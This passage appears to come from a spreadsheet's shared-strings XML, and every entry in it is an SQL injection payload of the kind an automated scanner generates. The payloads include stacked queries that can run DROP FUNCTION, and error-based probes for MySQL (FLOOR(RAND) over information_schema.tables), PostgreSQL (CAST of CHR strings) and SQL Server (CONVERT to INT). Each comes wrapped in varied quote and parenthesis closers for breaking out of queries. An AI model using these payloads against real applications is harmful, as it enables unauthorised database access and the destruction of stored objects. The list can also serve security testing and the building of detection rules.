    <t xml:space="preserve">  )  )  ; IF ( 3626 = 6944 )  SELECT 3626 ELSE DROP FUNCTION ynFI;-- AND   (  (  5224 = 5224</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (  4137 = 4137</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ; IF ( 5022 = 517 )  SELECT 5022 ELSE DROP FUNCTION XGLz;-- AND   (  (  8926 = 8926</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF ( 6634 = 5433 )  SELECT 6634 ELSE DROP FUNCTION IwUP;-- AND   (  (   ( 1960 = 1960</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (   ( 2386 = 2386</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   ) ; IF ( 7492 = 9951 )  SELECT 7492 ELSE DROP FUNCTION tejO;-- AND   (  (   ( 7752 = 7752</t>
  </si>
  <si>
    <t>' ) ; IF ( 5129 = 8929 )  SELECT 5129 ELSE DROP FUNCTION GRNj;-- AND  ( 'jrQQ' = 'jrQQ</t>
  </si>
  <si>
    <t>' ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND  ( 'Hzjq' = 'Hzjq</t>
  </si>
  <si>
    <t>' ) ; IF ( 6883 = 7962 )  SELECT 6883 ELSE DROP FUNCTION RPOP;-- AND  ( 'RXke' = 'RXke</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 2894 = 3546 )  SELECT 2894 ELSE DROP FUNCTION YFNh;-- AND   (  (  'VOQD' = 'VOQD</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (  'mivK' = 'mivK</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 868 = 9717 )  SELECT 868 ELSE DROP FUNCTION TIPc;-- AND   (  (  'SYft' = 'SYft</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 4377 = 941 )  SELECT 4377 ELSE DROP FUNCTION nhnj;-- AND   (  (   ( 'GQEf' = 'GQEf</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (   ( 'DTqn' = 'DTqn</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 7581 = 1911 )  SELECT 7581 ELSE DROP FUNCTION HgZK;-- AND   (  (   ( 'bcOE' = 'bcOE</t>
  </si>
  <si>
    <t>'; IF ( 9415 = 7061 )  SELECT 9415 ELSE DROP FUNCTION nnKH;-- AND 'GTzs' = 'GTzs</t>
  </si>
  <si>
    <t>'; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND 'MtGx' = 'MtGx</t>
  </si>
  <si>
    <t>'; IF ( 50 = 4149 )  SELECT 50 ELSE DROP FUNCTION jnny;-- AND 'Rgel' = 'Rgel</t>
  </si>
  <si>
    <t>' ) ; IF ( 2113 = 3464 )  SELECT 2113 ELSE DROP FUNCTION PPnd;-- AND  ( 'fXOr' LIKE 'fXOr</t>
  </si>
  <si>
    <t>' ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND  ( 'LKGT' LIKE 'LKGT</t>
  </si>
  <si>
    <t>' ) ; IF ( 5488 = 5912 )  SELECT 5488 ELSE DROP FUNCTION LHLs;-- AND  ( 'BCOt' LIKE 'BCOt</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 2577 = 4984 )  SELECT 2577 ELSE DROP FUNCTION orsI;-- AND   (  (  'ykGE' LIKE 'ykGE</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (  'hjkk' LIKE 'hjkk</t>
  </si>
  <si>
    <t>'  )  )  ; IF ( 4533 = 6319 )  SELECT 4533 ELSE DROP FUNCTION Ezao;-- AND   (  (  'Kisr' LIKE 'Kisr</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 9120 = 131 )  SELECT 9120 ELSE DROP FUNCTION Bkow;-- AND   (  (   ( 'FKlY' LIKE 'FKlY</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (   ( 'oDWS' LIKE 'oDWS</t>
  </si>
  <si>
    <t>'  )  )   ) ; IF ( 829 = 8654 )  SELECT 829 ELSE DROP FUNCTION Cqct;-- AND   (  (   ( 'LxgM' LIKE 'LxgM</t>
  </si>
  <si>
    <t>'; IF ( 9480 = 4462 )  SELECT 9480 ELSE DROP FUNCTION goaW;-- AND 'poOU' LIKE 'poOU</t>
  </si>
  <si>
    <t>'; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND 'nPuf' LIKE 'nPuf</t>
  </si>
  <si>
    <t>'; IF ( 2353 = 6809 )  SELECT 2353 ELSE DROP FUNCTION RPxT;-- AND 'mgpl' LIKE 'mgpl</t>
  </si>
  <si>
    <t>" ) ; IF ( 7718 = 8507 )  SELECT 7718 ELSE DROP FUNCTION Zdpf;-- AND  ( "YihO" = "YihO</t>
  </si>
  <si>
    <t>" ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND  ( "RPDR" = "RPDR</t>
  </si>
  <si>
    <t>" ) ; IF ( 9962 = 8116 )  SELECT 9962 ELSE DROP FUNCTION vliP;-- AND  ( "JLiz" = "JLiz</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 3640 = 7437 )  SELECT 3640 ELSE DROP FUNCTION JFrG;-- AND   (  (  "ROge" = "ROge</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (  "uAkO" = "uAkO</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 4745 = 1440 )  SELECT 4745 ELSE DROP FUNCTION IghH;-- AND   (  (  "fKEM" = "fKEM</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 2828 = 9878 )  SELECT 2828 ELSE DROP FUNCTION rmwJ;-- AND   (  (   ( "xIpa" = "xIpa</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (   ( "qHaT" = "qHaT</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 7567 = 4362 )  SELECT 7567 ELSE DROP FUNCTION fUEA;-- AND   (  (   ( "lsYK" = "lsYK</t>
  </si>
  <si>
    <t>"; IF ( 8781 = 958 )  SELECT 8781 ELSE DROP FUNCTION gTcw;-- AND "oZOJ" = "oZOJ</t>
  </si>
  <si>
    <t>"; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND "EtYe" = "EtYe</t>
  </si>
  <si>
    <t>"; IF ( 2205 = 3546 )  SELECT 2205 ELSE DROP FUNCTION oVdz;-- AND "awSn" = "awSn</t>
  </si>
  <si>
    <t>" ) ; IF ( 1586 = 9408 )  SELECT 1586 ELSE DROP FUNCTION fvlT;-- AND  ( "PWRd" LIKE "PWRd</t>
  </si>
  <si>
    <t>" ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND  ( "JOJd" LIKE "JOJd</t>
  </si>
  <si>
    <t>" ) ; IF ( 2541 = 3298 )  SELECT 2541 ELSE DROP FUNCTION cGpY;-- AND  ( "Casn" LIKE "Casn</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 9412 = 6157 )  SELECT 9412 ELSE DROP FUNCTION cNLI;-- AND   (  (  "ChhK" LIKE "ChhK</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (  "GkXH" LIKE "GkXH</t>
  </si>
  <si>
    <t>"  )  )  ; IF ( 307 = 8966 )  SELECT 307 ELSE DROP FUNCTION sxzv;-- AND   (  (  "zwHG" LIKE "zwHG</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 3012 = 8411 )  SELECT 3012 ELSE DROP FUNCTION SQgA;-- AND   (  (   ( "vbvB" LIKE "vbvB</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND   (  (   ( "lFDB" LIKE "lFDB</t>
  </si>
  <si>
    <t>"  )  )   ) ; IF ( 8282 = 5111 )  SELECT 8282 ELSE DROP FUNCTION YtxL;-- AND   (  (   ( "zkCo" LIKE "zkCo</t>
  </si>
  <si>
    <t>"; IF ( 1292 = 1745 )  SELECT 1292 ELSE DROP FUNCTION IVIG;-- AND "UEkb" LIKE "UEkb</t>
  </si>
  <si>
    <t>"; IF ( 3509 = 3509 )  SELECT 3509 ELSE DROP FUNCTION mjwI;-- AND "slXs" LIKE "slXs</t>
  </si>
  <si>
    <t>"; IF ( 8195 = 1044 )  SELECT 8195 ELSE DROP FUNCTION emAd;-- AND "uMyi" LIKE "uMyi</t>
  </si>
  <si>
    <t xml:space="preserve"> )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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">' AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a ) </t>
  </si>
  <si>
    <t xml:space="preserve">"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</si>
  <si>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AND  ( 3869 = 3869</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (  6272 = 6272</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (   ( 5532 = 5532</t>
  </si>
  <si>
    <t xml:space="preserve"> AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a ) </t>
  </si>
  <si>
    <t>' )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND  ( 'PpFI' = 'PpFI</t>
  </si>
  <si>
    <t>'  )  )   AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (  'XnsR' = 'XnsR</t>
  </si>
  <si>
    <t>'  )  )   )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (   ( 'dhco' = 'dhco</t>
  </si>
  <si>
    <t>' AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND 'akJb' = 'akJb</t>
  </si>
  <si>
    <t>' )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND  ( 'KqGP' LIKE 'KqGP</t>
  </si>
  <si>
    <t>'  )  )   AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (  'rpEx' LIKE 'rpEx</t>
  </si>
  <si>
    <t>'  )  )   )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (   ( 'tZDZ' LIKE 'tZDZ</t>
  </si>
  <si>
    <t>' AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND 'XnoT' LIKE 'XnoT</t>
  </si>
  <si>
    <t>" )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND  ( "aENH" = "aENH</t>
  </si>
  <si>
    <t>"  )  )   AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (  "VTrg" = "VTrg</t>
  </si>
  <si>
    <t>"  )  )   )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (   ( "qDEx" = "qDEx</t>
  </si>
  <si>
    <t>" AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND "zHIR" = "zHIR</t>
  </si>
  <si>
    <t>" )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND  ( "bgwy" LIKE "bgwy</t>
  </si>
  <si>
    <t>"  )  )   AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (  "QsyB" LIKE "QsyB</t>
  </si>
  <si>
    <t>"  )  )   )  AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND   (  (   ( "PBwR" LIKE "PBwR</t>
  </si>
  <si>
    <t>" AND  ( SELECT 8121 FROM ( SELECT COUNT ( * ) ,CONCAT ( CHAR ( 58,99,108,122,58 ) , ( SELECT  ( CASE WHEN  ( 8121 = 8121 )  THEN 1 ELSE 0 END  )  )  ,CHAR ( 58,120,105,100,58 ) ,FLOOR ( RAND ( 0 ) *2  )  )  x FROM information_schema.tables GROUP BY x ) a )  AND "RvXY" LIKE "RvXY</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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AND  ( 3652 = 3652</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (  7067 = 7067</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (   ( 7274 = 7274</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC ) </t>
  </si>
  <si>
    <t>' )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND  ( 'HXoj' = 'HXoj</t>
  </si>
  <si>
    <t>'  )  )   AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (  'eooi' = 'eooi</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (   ( 'ayUw' = 'ayUw</t>
  </si>
  <si>
    <t>' AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND 'BRWP' = 'BRWP</t>
  </si>
  <si>
    <t>' )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND  ( 'MJya' LIKE 'MJya</t>
  </si>
  <si>
    <t>'  )  )   AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (  'vbXm' LIKE 'vbXm</t>
  </si>
  <si>
    <t>'  )  )   )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (   ( 'VuGy' LIKE 'VuGy</t>
  </si>
  <si>
    <t>' AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND 'GXbL' LIKE 'GXbL</t>
  </si>
  <si>
    <t>" )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND  ( "RSbW" = "RSbW</t>
  </si>
  <si>
    <t>"  )  )   AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (  "VnBr" = "VnBr</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (   ( "BVsr" = "BVsr</t>
  </si>
  <si>
    <t>" AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND "orWH" = "orWH</t>
  </si>
  <si>
    <t>" )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND  ( "haml" LIKE "haml</t>
  </si>
  <si>
    <t>"  )  )   AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (  "gImC" LIKE "gImC</t>
  </si>
  <si>
    <t>"  )  )   )  AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND   (  (   ( "JRbz" LIKE "JRbz</t>
  </si>
  <si>
    <t>" AND 7767 = CAST ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 7767 = 7767 )  THEN 1 ELSE 0 END  )  )  ::text||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 )  AS NUMERIC )  AND "mVZj" LIKE "mVZj</t>
  </si>
  <si>
    <t xml:space="preserve"> )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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">' AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">"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</si>
  <si>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AND  ( 7877 = 7877</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  1588 = 1588</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 9401 = 9401</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   ) </t>
  </si>
  <si>
